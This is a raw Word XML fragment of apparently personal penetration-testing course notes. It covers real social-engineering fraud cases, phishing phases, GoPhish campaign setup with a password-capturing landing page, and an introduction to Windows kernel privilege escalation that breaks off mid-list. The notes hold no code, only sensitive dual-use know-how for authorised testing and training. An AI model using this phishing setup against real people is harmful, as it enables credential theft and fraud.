          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54AF2150"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hat does that have to do with cybersecurity?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9DEB47" w14:textId="7399855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 xml:space="preserve">Compromising information/access that shouldn’t be </w:t>
      </w:r>
      <w:r w:rsidR="00A5636A" w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>shared.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E57EE3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er Awareness and Training</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5B862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curity Controls – Hardware or Software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7835965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Defense in Depth – Zero Trust policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD6BA6A" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ABA50BE"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Google Facebook Fake Invoicing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B879D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2013-2015</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1828024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mpersonated Electronics Manufacturer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EB51D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Fake Invoices with Forged Executive Signatures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAF002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100 million USD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A6366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ulprit Arrested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8203E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Funds Recovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DBAF40"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FACC CEO Fraud</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDEDBE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2016</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A7FD5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54 million euros stolen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AF088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irplane Parts Manufacturer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E75B5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Fake-president Fraud</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A8F8B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Finish the deal impersonation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61598C7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EO and CFO fired, sued</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436DCBB4" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="662C8D82"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START (INFO GATHERING)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563D9B40"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PHISH (SPOOFED EMAILS, URGENCY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1479DD17"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RESPONSE (TARGETS RECEIVED EMAILS, NO REFLECTION/QUESTIONING)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222371FB"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DAMAGE (ATTACKERS GAIN ACCESS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D86D9E" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="002A77BD"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THE RESULT (AFTER-EFFECT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26930704" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DF2328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Robinhood Vishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F88F64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ovember 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145CD31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lled Customer Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481AF644"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Keys to System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D667188"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scalated it to gather information about the customer service rep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1E5EA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Gained &gt;5million emails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E21E3E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2 million fullnames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153076B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310 PII (birthdays, zipcodes, etc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F476953" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A09859"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Fake Excel File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390190A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pril 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C166BE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usiness Email Compromise (BEC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53361040"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Looks like Excel file (.xls file extension)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1A3BD8"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ctually an HTML file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7576AA14"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Fake Office 365 Login Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6467AE96"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eaches out to attacker utilizing a fake Excel sheet if opened on a browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A18AED" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="685BAF84"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HTML Table Windows Logo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206939E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pril 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDE989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lastRenderedPageBreak/>
        <w:t>Email Impersonation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1991FFD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ypass Email Filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1110296E"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tches Images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34122A64"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llows Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F11878" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37447AC7"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FIN7 USB Mail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5926ED3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August to November 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45668D40"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ackages sent via UPS and US Postal Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A45B44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mpersonated Department of Health and Human Services and Amazon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F21F471"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B stick laced with malicious software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AB5510" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BEB219F"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Penetration Testing &amp; Social Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0675D6A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urpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B8DBA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nformation Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCF495E"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xternal Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3E81E0"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hysical Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B094957" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E4F55B5"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What are the Vulnerabilities?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44980F6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hat is allowed?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18944FB8"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ake sure all your actions are within the bounds of your contract.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC3032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nformation Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305C1F85"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Determine certain things about the organization discretely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593207EF"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alking with individuals from the org and get info out of them about the org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6734C3"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ocial areas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65600DFB" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31053AD0"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External Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AE153B"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Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21713FD8"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redentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AAF8EB" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1C12BC"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Physical Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7207751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adges, bypass those doors through social eng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2323AF13"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ubber duckies/USBs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B003CE7"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LADDERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432D2AF5"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bles, Servers, curl back to Command n’ Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D5C5F5" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42181063" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>GoPhish (gophish.exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30396B46"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hishing campaign setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D536F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Tool is written in the Go scripting language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA9A59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GoPhish server should be set up on your loopback device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A41D311" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A4B04EC"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t up profile, fill out:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B08B217"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ame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A50CD3"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nterface Type should default to SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E9C6D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From (fake email)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207E8EFC" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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x: info &lt;support@demo.ine.local&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324021B4"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Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6159CD28" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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Generally going to be localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D205E68"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ername</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD2A4AE" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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x: “red[@]demo[.]ine[.]local”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45048C70" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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eed to set up email or disposable email for this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8C8DD0"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Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D293855" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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hould have this already, otherwise enter in a new password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1162F192"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Import Site/Landing Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDA159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n create a landing page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187B8B3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eed a domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56978CE6"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ould utilize an already created site or create HTML code in this section to build up a fake website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0532F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pture submitted Data (CHECK, IF ALLOWED)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558003CB"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pture passwords (CHECK, IF ALLOWED)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E5E16"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Redirect (usually can redirect back to localhost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470C3594"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reate an email template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A704276"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hat GoPhish will bounce back to the victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB27E95"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eed to create an email template that reflects what the victim might usually see</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAF1289"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sers &amp; Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40670E13"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pecify targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C93D5EE"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eed First name, Last name, email, and position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E82DBE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mpaigns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3C3CCF"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Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF5BAFF"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mail Template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7013B4C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Landing Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0A5483"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URL (generally localhost, or where your website is hosted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A58FDEF"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Launch Date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13127339"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nd emails by (optional, will schedule)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DB0A6D"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ending Profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2BE4B1"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Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F1461F"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RING EVERYTHING TOGETHER FOR THE CAMPAIGN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301BFBCA"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Will generate results for the campaign, and display the following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9736C5"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mails sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101CFADC"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Emails opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D094DA"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licked link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EB3B3F"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Submitted Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194CC7BD" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31976E0F" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRP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Backend of the fake website could potentially take a long time to develop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19660B78" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Landing Page &amp; Email Template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD2C226" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Can export results as a CSV and send to clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7E741A" w14:textId="15E9815C" w:rsidR="002D6AC0" w:rsidRDefault="002D6AC0" w:rsidP="002D6AC0">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Windows Kernel Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5EC07B" w14:textId="77777777" w:rsidR="002D6AC0" w:rsidRDefault="002D6AC0" w:rsidP="002D6AC0">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F0BBBB" w14:textId="753B5C40" w:rsidR="002D6AC0" w:rsidRDefault="002D6AC0" w:rsidP="002D6AC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Privilege Escalation is the process of exploiting vulnerabilities or misconfigurations in systems to elevate privileges from one user to another, typically to a user with administrative or root access or system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8F5E8B" w14:textId="6C79E4F1" w:rsidR="002D6AC0" w:rsidRDefault="002D6AC0" w:rsidP="002D6AC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Privilege escalation is a vital element of the attack life cycle and is a major determinant in the overall success of a penetration test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069A4170" w14:textId="2B6381F5" w:rsidR="002D6AC0" w:rsidRDefault="002D6AC0" w:rsidP="002D6AC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After gaining an initial foothold on a target system you will be required to elevate your privileges to perform tasks and functionality that require administrative privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FE7A38" w14:textId="186B7AA4" w:rsidR="002D6AC0" w:rsidRDefault="002D6AC0" w:rsidP="002D6AC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The importance of privilege escalation in the penetration testing process cannot be overstated or overlooked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F24D6E5" w14:textId="2A5E116D" w:rsidR="002D6AC0" w:rsidRDefault="002D6AC0" w:rsidP="002D6AC0">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You can’t just stop at initial access; you need to be able to elevate privileges as much as possible. If a company can prevent you from elevating privileges when you’ve tried every route possible, that is a testament to their cyber defense capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2E2575" w14:textId="77777777" w:rsidR="002D6AC0" w:rsidRDefault="002D6AC0" w:rsidP="002D6AC0">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54044F79" w14:textId="0441A5B4" w:rsidR="002D6AC0" w:rsidRDefault="002D6AC0" w:rsidP="002D6AC0">
      <w:p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Windows Kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43813615" w14:textId="6CAE453B" w:rsidR="002D6AC0" w:rsidRDefault="002D6AC0" w:rsidP="002D6AC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A kernel is a computer program that is the core of an operating system and has complete control over every resource and hardware on a system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F56B45E" w14:textId="4A9C0437" w:rsidR="002D6AC0" w:rsidRDefault="002D6AC0" w:rsidP="002D6AC0">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Essentially the CORE of the operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A41296" w14:textId="2AB29295" w:rsidR="002D6AC0" w:rsidRDefault="002D6AC0" w:rsidP="002D6AC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Windows NT is the kernel that comes pre-packaged with all versions of Microsoft Windows and operates as a traditional kernel with a few exceptions based on user design philosophy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E86ACF" w14:textId="50BB37DE" w:rsidR="002D6AC0" w:rsidRDefault="002D6AC0" w:rsidP="002D6AC0">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User Mode – Programs and services running in user mode have limited access to system resources and functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7589321E" w14:textId="0D66B592" w:rsidR="002D6AC0" w:rsidRDefault="002D6AC0" w:rsidP="002D6AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Kernel Mode – Kernel mode has unrestricted access to system resources and functionality with the added functionality of managing devices and system memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2F40A0" w14:textId="5E40A728" w:rsidR="002D6AC0" w:rsidRDefault="002D6AC0" w:rsidP="002D6AC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Any command executed with the kernel has the absolute highest level of authority when executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1222E469" w14:textId="77777777" w:rsidR="002D6AC0" w:rsidRDefault="002D6AC0" w:rsidP="002D6AC0">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D62EDF4" w14:textId="16BB7D5B" w:rsidR="002D6AC0" w:rsidRDefault="002D6AC0" w:rsidP="002D6AC0">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Kernel exploits on Windows will typically target vulnerabilities in the Windows kernel to execute arbitrary code to run privileged system commands or obtain a system shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3F8635" w14:textId="77777777" w:rsidR="002D6AC0" w:rsidRPr="002D6AC0" w:rsidRDefault="002D6AC0" w:rsidP="002D6AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16C4F8D6" w14:textId="4E0B0C17" w:rsidR="008C78A9" w:rsidRPr="008C78A9" w:rsidRDefault="002D6AC0" w:rsidP="008C78A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Privilege escalation on Windows systems will typically follow the following methodology:</w:t>
      </w:r>
    </w:p>
